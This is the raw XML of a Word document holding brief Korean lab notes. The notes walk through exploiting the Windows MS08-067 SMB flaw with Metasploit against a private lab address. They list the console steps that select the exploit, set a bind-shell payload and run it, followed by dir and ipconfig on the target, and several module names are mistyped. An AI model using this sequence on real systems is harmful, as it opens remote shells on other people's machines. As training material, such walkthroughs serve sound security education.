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C6F51" w14:textId="0BCCB09F" w:rsidR="005F1761" w:rsidRDefault="00CD76A5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>indow 테</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 공격할 취약점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A07E21" w14:textId="69FEEB35" w:rsidR="00CD76A5" w:rsidRDefault="00CD76A5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="793C9871" wp14:editId="7C69046F">
            <wp:extent cx="4500000" cy="337250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37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4ACA" w14:textId="485EB958" w:rsidR="00CD76A5" w:rsidRDefault="00CD76A5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">상세 설명 아래에 </w:t>
      </w:r>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>할 수 있는 도구가 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F94121" w14:textId="70F552E4" w:rsidR="00CD76A5" w:rsidRDefault="00CD76A5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">우리는 여기서 </w:t>
      </w:r>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 사용해서 공격해볼 것이다.</w:t>
      </w:r>
      <w:r w:rsidR="005A129B">
        <w:br/>
      </w:r>
      <w:r w:rsidR="005A129B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">아래의 명령어를 통해 </w:t>
      </w:r>
      <w:r w:rsidR="005A129B">
        <w:t>metasplot</w:t>
      </w:r>
      <w:r w:rsidR="005A129B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 실행할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4502409F" w14:textId="31D25CC1" w:rsidR="001A7254" w:rsidRDefault="001A7254" w:rsidP="001A725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t>M</w:t>
      </w:r>
      <w:r w:rsidR="005A129B">
        <w:t>sfconsole</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Search ms08-067</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C4E4DD" w14:textId="2A2217B0" w:rsidR="00CD76A5" w:rsidRDefault="00FF4A8E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09C62EC" wp14:editId="5B4A5EBB">
            <wp:extent cx="4500000" cy="337250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37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977B" w14:textId="7A79A1F2" w:rsidR="001A7254" w:rsidRDefault="001A72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09148" wp14:editId="6549AB08">
            <wp:extent cx="5040000" cy="3777206"/>
            <wp:effectExtent l="0" t="0" r="825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B7CA" w14:textId="1CFC4E97" w:rsidR="001A7254" w:rsidRPr="001A7254" w:rsidRDefault="001A7254" w:rsidP="001A7254">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A7254">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7254">
        <w:t xml:space="preserve"> exploit/winds/smb/ms08_067_netapi</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7254">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001A7254">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>show</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7254">
        <w:t xml:space="preserve"> payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C591AC" w14:textId="2B94B23F" w:rsidR="001A7254" w:rsidRDefault="001A7254">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7319ABCB" wp14:editId="4A3BA081">
            <wp:extent cx="5040000" cy="3777206"/>
            <wp:effectExtent l="0" t="0" r="825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1551" w14:textId="34DFB807" w:rsidR="001A7254" w:rsidRDefault="001A7254">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A7254">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7254">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> payloads window/shell/</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7254">
        <w:rPr>
          <w:rStyle w:val="builtin"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bind</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7254">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E82B53" w14:textId="77777777" w:rsidR="001A7254" w:rsidRDefault="001A7254">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D185FA8" wp14:editId="664720A1">
            <wp:extent cx="5040000" cy="3777206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D4E1" w14:textId="37E6EFB5" w:rsidR="001A7254" w:rsidRPr="001A7254" w:rsidRDefault="001A7254">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A7254">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7254">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> RHOST </w:t>
      </w:r>
      <w:r w:rsidRPr="001A7254">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>10.0.2.</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7254">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46144C52" w14:textId="1E2B94CA" w:rsidR="00893E56" w:rsidRPr="00893E56" w:rsidRDefault="001A7254">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A7254">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidR="00893E56">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">을 </w:t>
      </w:r>
      <w:r w:rsidR="00893E56">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">통해 명령어를 실행하고 </w:t>
      </w:r>
      <w:r w:rsidR="00893E56">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:r w:rsidR="00893E56">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 통해 현재</w:t>
      </w:r>
      <w:r w:rsidR="00893E56">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00893E56">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>디렉토리의 정보를 알려준다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A3B818" w14:textId="08F7D537" w:rsidR="001A7254" w:rsidRDefault="001A7254">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="056B0CAA" wp14:editId="59CF5BB2">
            <wp:extent cx="5040000" cy="3777206"/>
            <wp:effectExtent l="0" t="0" r="825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4B91" w14:textId="2E11BBB0" w:rsidR="00893E56" w:rsidRDefault="00893E56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다음 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 명령어</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795A1B70" w14:textId="207A9933" w:rsidR="00893E56" w:rsidRPr="001A7254" w:rsidRDefault="00893E56">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia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01E1EA7C" wp14:editId="02FD8F49">
            <wp:extent cx="5040000" cy="3777206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3E56" w:rsidRPr="001A72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4E6B2A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9654BFA6"/>
    <w:lvl w:ilvl="0" w:tplc="9BB2733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53B"/>
    <w:rsid w:val="001A7254"/>
    <w:rsid w:val="005A129B"/>
    <w:rsid w:val="005F1761"/>
    <w:rsid w:val="00893E56"/>
    <w:rsid w:val="009B253B"/>
    <w:rsid w:val="00CD76A5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99D6E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{649933FC-0B82-4011-8B14-0EFDC4A59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7254"/>
    <w:pPr>
      <w:ind w:leftChars="400" w:left="800"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="keyword">
    <w:name w:val="keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="001A7254"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="builtin">
    <w:name w:val="built_in"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="001A7254"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="number">
    <w:name w:val="number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="001A72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정경재</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-24T07:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-24T08:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>